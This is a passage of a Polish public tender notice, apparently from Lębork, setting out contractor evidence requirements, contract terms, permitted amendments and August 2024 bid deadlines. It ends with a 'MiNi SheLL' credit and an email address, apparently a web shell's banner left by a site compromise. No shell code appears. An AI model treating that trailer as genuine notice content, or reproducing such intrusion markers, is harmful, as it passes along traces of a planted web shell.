(wykaz robót budowlanych zgodnie z Załącznikiem nr 3 do<br/>SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami wykaz usług<br/>dotyczyć ma usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby dotyczące spełnienia warunku udziału w postępowaniu – według<br/>Załącznika nr 2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Wykaz usług wykonanych w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów<br/>określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy (wykaz robót budowlanych zgodnie z Załącznikiem nr 3 do<br/>SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami wykaz usług<br/>dotyczyć ma usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby dotyczące spełnienia warunku udziału w postępowaniu – według Załącznika nr 2 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.Wykaz usług wykonanych w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów<br/>określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy (wykaz robót budowlanych zgodnie z Załącznikiem nr 3 do<br/>SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami wykaz usług<br/>dotyczyć ma usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby dotyczące spełnienia warunku udziału w postępowaniu – według Załącznika nr 2 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Pełnomocnictwo winno zostać<br/>złożone w formie opisanej w pkt. 5.11 ppkt.1 ogłoszenia.<br/>2. W celu potwierdzenia braku podstaw wykluczenia z postępowania każdy z Wykonawców złoży osobno oświadczenie<br/>wymienione w pkt. 5.6. ogłoszenia.<br/>3. W celu potwierdzenia spełniania warunków udziału w postępowaniu każdy z Wykonawców złoży osobno dokumenty i<br/>oświadczenia wymienione w pkt. 5.7. ogłoszenia w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu<br/>4. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania,<br/>Zamawiający żąda od wykonawcy wspólnie ubiegającego się o udzielenie zamówienia dokumentu, o którym mowa w pkt.5.11. ppkt.1. ogłoszenia.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane. Wówczas wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy.<br/>7.Zamawiający nie narzuca osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia kluczowych etapów realizacji zadania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Poza przypadkami wymienionymi w art. 455 ust. 1 pkt. 2) lit. b i c i 4) oraz ust. 2 ustawy prawo zamówień publicznych, przewiduje się możliwość dokonania istotnych zmian postanowień umowy w stosunku do treści złożonej oferty na podstawie której dokonano wyboru wykonawcy, dotyczących:<br/>1.1.	Terminu zakończenia robót, o czas trwania przeszkody w następujących przypadkach:<br/>1.1.1.	jeżeli przyczyny, dla których będzie zagrożone dotrzymanie terminu zakończenia robót, będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności konieczności zmian dokumentacji, w zakresie w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie terminu zakończenia zadania;<br/>1.1.2.	w przypadku konieczności wstrzymania prac z przyczyn niezależnych od Wykonawcy;<br/>1.1.3.	wystąpienia siły wyższej czyli zdarzenia, którego Strony nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub w całości jego zobowiązań umownych;<br/>1.1.4.	w przypadku odkrycia na terenie prac przedmiotów, co do których zaistnieje podejrzenie, iż są to przedmioty o znaczeniu historycznym, bądź innych przedmiotów podlegających ochronie;<br/>1.2.	Zmiany wysokości wynagrodzenia związane z:<br/>1.2.1.	wystąpieniem siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami <br/>jednak nie stanowi to zobowiązania do wyrażenia zgody na takie zmiany.<br/>2.	Zamawiający dopuszcza możliwość odstąpienia od umowy, zgodnie z Art. 456 ust. 1 pkt. 1), 2) lit. a i b) ustawy Prawo zamówień publicznych.<br/>3.	Dopuszczalne są również zmiany umowy oraz wprowadzenie nowych postanowień do umowy, które będą korzystne dla Zamawiającego, a które nie będą wykraczać poza treść oferty, na podstawie której dokonano wyboru Wykonawcy, a zmiany nie będą istotne zgodnie z zapisami art. 454 ustawy Pzp oraz z uwzględnieniem zapisów art. 433 pkt 4) ustawy Pzp.<br/>4.	Ustala się, iż nie stanowi zmiany umowy w rozumieniu art. 454 ustawy Pzp:<br/>4.1.	Zmiana numeru rachunku bankowego;<br/>4.2.	Zmiana osób przeznaczonych do realizacji zamówienia;<br/>4.3.	Zmiana danych teleadresowych.<br/>Zaistnienie okoliczności, o których mowa w niniejszym punkcie wymaga jedynie niezwłocznego pisemnego zawiadomienia drugiej Strony. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umlebork.ezamawiajacy.pl/app/login</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-22 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com